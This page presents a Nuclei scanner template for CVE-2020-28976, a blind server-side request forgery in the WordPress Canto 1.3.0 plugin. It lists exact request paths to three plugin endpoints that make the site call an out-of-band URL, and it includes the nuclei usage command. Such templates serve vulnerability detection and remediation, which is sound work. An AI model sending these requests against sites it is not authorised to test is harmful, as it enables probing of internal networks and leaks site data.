WordPress Canto 1.3.0 - Blind Server-Side Request Forgery

ID: CVE-2020-28976

Severity: medium

Author: LogicalHunter

Tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto

Description

WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

id: CVE-2020-28976

info:
  name: WordPress Canto 1.3.0 - Blind Server-Side Request Forgery
  author: LogicalHunter
  severity: medium
  description: WordPress Canto plugin 1.3.0 is susceptible to blind server-side request forgery. An attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access to sensitive internal resources and potential data leakage.
  remediation: |
    Update WordPress Canto to the latest version (1.3.1) or apply the patch provided by the vendor.
  reference:
    - https://www.exploit-db.com/exploits/49189
    - https://www.canto.com/integrations/wordpress/
    - https://github.com/CantoDAM/Canto-Wordpress-Plugin
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28976
    - http://packetstormsecurity.com/files/160358/WordPress-Canto-1.3.0-Server-Side-Request-Forgery.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-28976
    cwe-id: CWE-918
    epss-score: 0.00616
    epss-percentile: 0.78728
    cpe: cpe:2.3:a:canto:canto:1.3.0:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: canto
    product: canto
    framework: wordpress
  tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/canto/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'Canto'
          - 'Tested up to:'
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}"
      - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: body
        words:
          - "null"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100e57816c17057af479f52b14b286d6b05619a4c94ec7130e5cdc0e8e95cfc453b022100ef21d2445ad0b8570d9418465620da12726f9e8ceacbbfca7ac027895eed2169:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-28976.yaml"

View on Github